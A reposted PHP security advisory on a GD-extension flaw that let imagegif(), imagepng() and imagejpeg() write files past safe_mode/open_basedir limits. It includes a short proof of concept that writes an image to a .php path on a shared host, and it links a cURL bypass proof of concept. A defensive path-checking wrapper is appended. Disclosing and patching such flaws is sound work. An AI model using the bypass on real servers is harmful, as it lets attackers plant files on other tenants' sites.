[Repost] PHP local safe directory restriction bypass vulnerability and test code
Source: slythers (at) gmail (dot) com
There is a vulnerability (local safedir restriction bypass) identified within the GD extension affecting
the following functions:
- imagegif()
- imagepng()
- imagejpeg()
in /ext/gd/gd.c line 1647
Which is now fixed in the cvs
[url]http://cvs.php.net/co.php/php-src/ext/gd/gd.c?r=1.312.2.1#1786[/url]
POC:
with an image like [url]http://81.57.125.106/~slythers/file.gif[/url]
<?php
$im = imagecreatefromgif("file.gif");
imagegif($im, '/var/www/f34r.fr/c/f/elbossoso/.i.need.money.php');
?>
cURL open_basedir and safe_mode bypass.
POC:
[url]http://www.eviloctal.com/forum/read.php?fid=22&tid=15607&toread=1[/url]
As you notice, we can bypass the safedir which leads to access to any
files on any shared servers.
This is fixed in the cvs.
slythers (at) gmail (dot) com
greets : david coallier <davidc (at) php (dot) net>
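On an unpatched build, an application that passes a destination filename to imagegif(), imagepng() or imagejpeg() can enforce the directory restriction itself before the write. The following is an added example, not code from the advisory or from php-src; `path_within_bases()`, `safe_image_write()` and the demo directory are hypothetical names, and it assumes the GD extension is loaded.

```php
<?php
// Added example: application-level path check in front of the GD writers.

/** True if $path resolves inside one of $allowedBases (the file may not exist yet). */
function path_within_bases(string $path, array $allowedBases): bool
{
    $parent = realpath(dirname($path));        // resolves symlinks and ".."
    if ($parent === false) {
        return false;                          // parent directory missing
    }
    $target = $parent . DIRECTORY_SEPARATOR . basename($path);
    if (is_link($target)) {
        return false;                          // refuse to write through a symlink
    }
    foreach ($allowedBases as $base) {
        $base = realpath($base);
        if ($base === false) {
            continue;
        }
        // Trailing separator so "/srv/a" does not match "/srv/ab/...".
        $base = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
        if (strncmp($target, $base, strlen($base)) === 0) {
            return true;
        }
    }
    return false;
}

/** Write $im only if $dest lies inside an allowed base directory. */
function safe_image_write($im, string $dest, array $allowedBases, string $format = 'gif'): bool
{
    $writers = ['gif' => 'imagegif', 'png' => 'imagepng', 'jpeg' => 'imagejpeg'];
    if (!isset($writers[$format]) || !path_within_bases($dest, $allowedBases)) {
        return false;
    }
    return $writers[$format]($im, $dest);
}

// Constructed demo: a private directory under the system temp dir.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'gd_demo_' . getmypid();
mkdir($base);
$im = imagecreatetruecolor(4, 4);
var_dump(safe_image_write($im, "$base/out.gif", [$base]));        // inside the base
var_dump(safe_image_write($im, "$base/../escape.gif", [$base]));  // resolves outside
```

This only covers code paths that call the wrapper; on shared hosting the restriction has to come from the fixed GD extension, since other tenants' scripts call the GD functions directly.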